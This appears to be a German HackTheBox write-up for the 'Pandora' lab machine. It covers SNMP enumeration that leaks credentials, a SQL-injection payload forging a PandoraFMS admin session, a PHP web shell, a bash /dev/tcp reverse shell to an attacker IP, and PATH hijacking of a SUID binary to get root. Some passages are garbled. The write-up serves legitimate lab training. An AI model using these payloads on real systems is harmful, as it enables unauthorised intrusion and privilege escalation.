> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/writeups-ctf/hackthebox/linux-easy/pandora-hackthebox-writeup.md).

# Pandora HackTheBox Ausarbeitung

{% embed url="<https://app.hackthebox.com/machines/Pandora>" %}

{% hint style="warning" %}
**Fähigkeiten:**

* Schnelle SNMP-Aufzählung
* Informationsleck
* Lokale Portweiterleitung
* SQL-Injection - Übernahme einer Admin-Sitzung
* PandoraFMS v7.0NG Authentifizierte Remote-Code-Ausführung (CVE-2019-20224]
* Missbrauch einer benutzerdefinierten Binärdatei - PATH-Hijacking (Rechteausweitung)
  {% endhint %}

## Aufklärung

**Einrichtung des Arbeitsbereichs:**

Richten Sie den Arbeitsbereich ein, indem Sie drei Ordner erstellen, um wichtige Inhalte, Exploits und Nmap-Aufklärungsergebnisse zu speichern.

<figure><img src="/files/968c45b73f68a7eaa06e25648dedefe954bda7b5" alt="" width="563"><figcaption></figcaption></figure>

**VPN-Verbindung prüfen**

Prüfen Sie die VPN-Verbindung, um eine stabile Kommunikation mit dem Zielsystem sicherzustellen.

<figure><img src="/files/c7896a918ad04c02a9fddb781a99c0a2ab5af45c" alt="" width="563"><figcaption></figcaption></figure>

## TCP:

**Offene TCP-Ports mit Nmap finden:**

Erfassen Sie offene Ports und exportieren Sie die Ergebnisse in die Datei "allPorts" im Nmap-Verzeichnis:

```bash
nmap -p- --open -sS -n -Pn --min-rate 5000 10.10.11.136 -oG allPorts
```

<figure><img src="/files/21dd01a278a17e07259b6ea0cb421ebe14d747c9" alt=""><figcaption></figcaption></figure>

**Analyse offener Ports mit extractPorts:**

Verwende die Funktion extractPorts, um offene Ports in einem kompakten Format anzuzeigen und sie in die Zwischenablage zu kopieren (22.80)

<figure><img src="/files/7e65f9f3ff424e301ac2ca90febdf7935c17c9ac" alt="" width="563"><figcaption></figcaption></figure>

**TCP-Port-Version-Scan mit Nmap:**

Verwenden Sie Nmap, um die Service-Versionen zu scannen und die Ausgabe in der Datei "targeted" zu speichern:

```bash
nmap -sCV -p22,80 10.10.11.136 -oN targeted
```

<figure><img src="/files/a7c87de7c9b17b612d95daf07a13323cdf539eda" alt=""><figcaption></figcaption></figure>

### Port 80:

Wir verwendeten `whatweb` um die vom Webserver verwendeten Technologien zu identifizieren:

<div align="right" data-full-width="true"><figure><img src="/files/bbd57375ab1da1c7c35dee19119bd702b708f7d5" alt=""><figcaption></figcaption></figure></div>

Um Domänennamen über DNS in IP-Adressen aufzulösen, fügen Sie den mit seiner IP-Adresse verknüpften Domänennamen in die `/etc/hosts` vorhandenen Benutzern.

<figure><img src="/files/293dc86316eed7a5de42fb334369e881af6c6d8a" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/39cf669f19ad37b369b09b6359d23d95258cde9d" alt=""><figcaption></figcaption></figure>

## UDP:

**Offene UDP-Ports mit Nmap finden:**

Wir führen außerdem einen Scan der UDP-Ports mit **Nmap**:

```bash
nmap -sU --top-ports 100 --open -vvv -n 10.10.11.136 -oG allPortsUDP
```

wir entdecken die SNMP-Ports 161, 17185 und 49201

<figure><img src="/files/55df2a42385a4bcff14113d2346491c17b59a367" alt=""><figcaption></figcaption></figure>

**UDP-Port-Version-Scan mit Nmap:**

Verwendung von Nmap, um die Version der UDP-Ports zu scannen und die Informationen in die Datei "targeted" zu extrahieren:

```bash
nmap -sUCV -p 161,17185,49201 10.10.11.136 -oN targetedUDP
```

Entdeckung sensibler Informationen über SNMP, einschließlich eines Benutzers:

* `daniel`
* Passwort: `HotelBabylon23`.

<figure><img src="/files/181e3b38206184f4f4003b477d86afefc675bb68" alt=""><figcaption></figcaption></figure>

## Port 161 - SNMP

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp>" %}

**SNMP-Aufzählung**

Um die exponierten SNMP-Dienste zu untersuchen, verwendeten wir den folgenden Befehl

```bash
snmpbulkwalk -c public -v2c 10.10.11.136 > snmpcontent.txt
```

* Durch die Analyse des Inhalts von `snmpcontent.txt`entdeckten wir sensible Informationen, einschließlich gültiger Zugangsdaten:
  * **Benutzer**: `daniel`
  * **Passwort**: `HotelBabylon23`

<figure><img src="/files/83ea282089e16f9ce90179970faa31d1f2822fe8" alt=""><figcaption></figcaption></figure>

Mit den abgerufenen Informationen stellten wir eine SSH-Verbindung zur Zielmaschine her:

```bash
ssh daniel@10.10.11.136
```

<figure><img src="/files/73b4beaae06c5feae40a1a50930abe42dc4b8c21" alt=""><figcaption></figcaption></figure>

## **Privilegieneskalation**

**Erste Suche**

Durch das Durchsuchen der für den Benutzer zugänglichen Verzeichnisse `daniel`identifizierten wir interessante Dateien und Ordner im folgenden Pfad: `/var/www/pandora`

<div data-full-width="true"><figure><img src="/files/b1b105849ecb541e090986088b3291288e4ef689" alt=""><figcaption></figcaption></figure></div>

Dieses Verzeichnis enthält die PandoraFMS-Website, die von außen offenbar nicht direkt zugänglich ist.

**Portweiterleitung**

Um über unsere lokale Maschine auf die PandoraFMS-Oberfläche zuzugreifen, richteten wir einen SSH-Tunnel ein:

```bash
ssh -L 80:127.0.0.1:80 daniel@10.10.11.136
```

## Ausnutzung von Pandora FMS - SQL-Injection

### **SQL-Injection : Übernahme einer Admin-Sitzung**

Dieser Befehl leitet lokale HTTP-Anfragen an den internen Webserver um.

<figure><img src="/files/6c92ecbdd1d8e767e96ec630db83ca3b83bde59d" alt=""><figcaption></figcaption></figure>

Erkannte Version: **v7.0NG.742/\_FIX/\_PERL2020**.

<figure><img src="/files/8331e5bfcb6022b1631ecd13818a6179821d9828" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated>" %}

Bekannte Schwachstelle in `chart_generator.php` über die `session_id` Variable:

<figure><img src="/files/fd400e6bb4096262f3133ddbd40bc8b76b862bfa" alt=""><figcaption></figcaption></figure>

```
http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=1'
```

<figure><img src="/files/832996c9b4bdb5ef6aaf45bc5aa3163d6697f4fd" alt=""><figcaption></figcaption></figure>

Ausführen einer SQL-Injection, um eine Admin-Sitzung zu fälschen:

<pre class="language-bash"><code class="lang-bash"><strong>http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO
</strong></code></pre>

* Dieser Befehl gibt ein Admin-Sitzungscookie zurück.

<figure><img src="/files/1e8041bb35bbbe0fffa7ba7eb71fa6a2ea3504a2" alt=""><figcaption></figcaption></figure>

Verwendung des Cookies, um als Administrator auf das Dashboard zuzugreifen.

<figure><img src="/files/38a4c700295c916ab373cca5a68b35f38e12592a" alt=""><figcaption></figcaption></figure>

### **Remote-Code-Ausführung (RCE) - (CVE-2019-20224]**

Navigieren Sie zu **Dateimanager**.

<figure><img src="/files/28b5aa619d7929ec8402c0d0f041758fc7d2b1d2" alt=""><figcaption></figcaption></figure>

Hochladen einer bösartigen PHP-Datei:

<pre class="language-php"><code class="lang-php"><strong>&#x3C;?php system($_GET['cmd']); ?>
</strong></code></pre>

* Datei zugänglich über `http://127.0.0.1/pandora_console/images/cmd.php`.

<figure><img src="/files/1ef7842dbdf488237740b9c6711b87e7dd657158" alt=""><figcaption></figcaption></figure>

Ausführen einer Reverse Shell:

* Lokales Lauschen:

```bash
nc -nvlp 443
```

* Den Befehl auf dem Zielserver ausführen:

```bash
bash -c "bash -i >%26 /dev/tcp/10.10.14.26/443 0>%261"
```

Zugriff erlangt als Benutzer `matt`.

<figure><img src="/files/ad21a9e84797f2efb158f49966fd44e709b5cb1f" alt=""><figcaption></figcaption></figure>

**Terminal vorbereiten:**

```bash
script /dev/null -c bash
# Ctrl+Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184
```

Ermöglicht eine komfortablere Nutzung in einem interaktiven Terminal.

### Flag User.txt :)

<figure><img src="/files/12451fc907aec08e450a19363e56c4968be7b1e3" alt="" width="563"><figcaption></figcaption></figure>

## PATH-Hijacking - Missbrauch einer benutzerdefinierten Binärdatei

**Nach Binärdateien mit SUID-Berechtigungen suchen**

```bash
find / -perm -4000 2>/dev/null
```

Ergebnis: Eine interessante Binärdatei wurde gefunden:/ /\&#xNAN;**`/usr/bin/pandora_backup`**.

<figure><img src="/files/1deee487f2f0039e8efeb414cfe595d09e65f75f" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/265b01cea19479e44a5c009a4cd8c1412bf8050c" alt=""><figcaption></figcaption></figure>

**Binäranalyse mit `ltrace`**

Um zu verstehen, wie die Binärdatei funktioniert, verwendeten wir **`ltrace`** (ein Werkzeug zur Verfolgung von Systemaufrufen), um die von dieser Binärdatei ausgeführten Systemaufrufe zu beobachten:

```bash
ltrace /usr/bin/pandora_backup
```

Dies ermöglichte uns zu sehen, dass die Binärdatei den **KEEP/*****0/*****/\_** Befehl ausführte, ohne einen absoluten Pfad zur ausführbaren Datei zu verwenden, was eine potenzielle Schwachstelle darstellt. Mit anderen Worten: Wenn wir unsere **`PATH`** zu ändern, um ein Verzeichnis einzuschließen, das eine bösartige ausführbare Datei namens `tar`enthält, würde diese anstelle der ursprünglichen ausgeführt.

<figure><img src="/files/a205f7bb349fea7a4ec678e150a0b25b6b3d4f64" alt=""><figcaption></figcaption></figure>

**Ausnutzung durch PATH-Hijacking**

**Erstellen einer bösartigen `tar` Datei ein:** Wir erstellten eine Datei mit dem Namen `tar` in `/tmp/` Verzeichnis mit Ausführungsrechten **SUID**. Diese Datei enthält einen Befehl, um eine Bash-Shell mit erhöhten Rechten zu öffnen:

```bash
chmod 4777 /bin/bash
```

**Änderung des `PATH` Variable:** Um das System dazu zu zwingen, unsere bösartige Version von `tar`, haben wir die `PATH` Variable, um das `/tmp/` Verzeichnis

```bash
export PATH=/tmp/:$PATH
```

<figure><img src="/files/96a1b91ac74c37a0433f869506cb47fb8288056c" alt=""><figcaption></figcaption></figure>

**Ausführen der verwundbaren Binärdatei:** Nach der Änderung des `PATH`, führten wir die **`pandora_backup`** Binärdatei aus:

<figure><img src="/files/2102867808fcb370968e75edd098978c1bd969c8" alt=""><figcaption></figcaption></figure>

Durch das Ausführen unserer modifizierten Version von `tar`, wurde eine Bash-Shell mit erhöhten Rechten geöffnet, wodurch wir `root` Zugriff erhielten.

### Flag root.txt :)

<figure><img src="/files/e64bbb995e2294d780e6b6bae3f4621a72a83560" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/4990af3f9397815d22d4bf5f9ee48ed2d342df7b" alt="" width="515"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/writeups-ctf/hackthebox/linux-easy/pandora-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
